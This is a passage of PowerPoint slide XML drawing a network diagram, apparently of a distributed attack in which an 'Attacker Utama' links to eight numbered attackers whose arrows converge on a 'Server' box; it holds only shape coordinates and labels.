          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2209800" y="4343400"/>
            <a:ext cx="4495800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46102" name="Line 54"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2209800" y="4419600"/>
            <a:ext cx="4495800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46103" name="Line 55"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2209800" y="4495800"/>
            <a:ext cx="4495800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46104" name="Line 56"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2209800" y="5181600"/>
            <a:ext cx="4495800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46105" name="Line 57"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2209800" y="5257800"/>
            <a:ext cx="4495800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46106" name="Line 58"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2209800" y="5334000"/>
            <a:ext cx="4495800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46107" name="Line 59"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2209800" y="5410200"/>
            <a:ext cx="4495800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46108" name="Rectangle 60"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="2057400"/>
            <a:ext cx="1295400" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46109" name="Rectangle 61"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6858000" y="2057400"/>
            <a:ext cx="1295400" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46110" name="Rectangle 62"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6934200" y="4343400"/>
            <a:ext cx="1295400" cy="8382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669925" y="762000"/>
            <a:ext cx="1485900" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attacker Utama</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47107" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7070725" y="838200"/>
            <a:ext cx="982663" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Attacker 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47108" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6172200" y="1371600"/>
            <a:ext cx="982663" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Attacker 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47109" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5334000" y="1981200"/>
            <a:ext cx="982663" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Attacker 3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47110" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4419600" y="2590800"/>
            <a:ext cx="982663" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Attacker 4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47111" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3505200" y="3276600"/>
            <a:ext cx="982663" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Attacker 5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47112" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="3886200"/>
            <a:ext cx="982663" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Attacker 6</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47113" name="Text Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1828800" y="4648200"/>
            <a:ext cx="982663" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Attacker 7</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47114" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="5410200"/>
            <a:ext cx="982663" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Attacker 8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47115" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7146925" y="5486400"/>
            <a:ext cx="738188" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1"/>
              <a:t>Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47116" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="609600"/>
            <a:ext cx="1676400" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47117" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6705600" y="5181600"/>
            <a:ext cx="1600200" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47118" name="Line 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2209800" y="990600"/>
            <a:ext cx="4876800" cy="152400"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47119" name="Line 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2209800" y="1143000"/>
            <a:ext cx="4038600" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47120" name="Line 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2209800" y="1143000"/>
            <a:ext cx="3124200" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47121" name="Line 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2209800" y="1143000"/>
            <a:ext cx="2286000" cy="1524000"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="3175">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47122" name="Line 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2209800" y="1143000"/>
            <a:ext cx="1371600" cy="2209800"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="3175">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47123" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2209800" y="1143000"/>
            <a:ext cx="457200" cy="2819400"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="3175">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47124" name="Line 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="1981200" y="1143000"/>
            <a:ext cx="228600" cy="3505200"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="3175">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47125" name="Line 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="1066800" y="1143000"/>
            <a:ext cx="1143000" cy="4267200"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="3175">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47126" name="Line 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8001000" y="1143000"/>
            <a:ext cx="0" cy="4038600"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47127" name="Line 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7924800" y="1143000"/>
            <a:ext cx="0" cy="4038600"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47128" name="Line 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7848600" y="1143000"/>
            <a:ext cx="0" cy="4038600"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47129" name="Line 27"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6934200" y="1676400"/>
            <a:ext cx="762000" cy="3505200"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
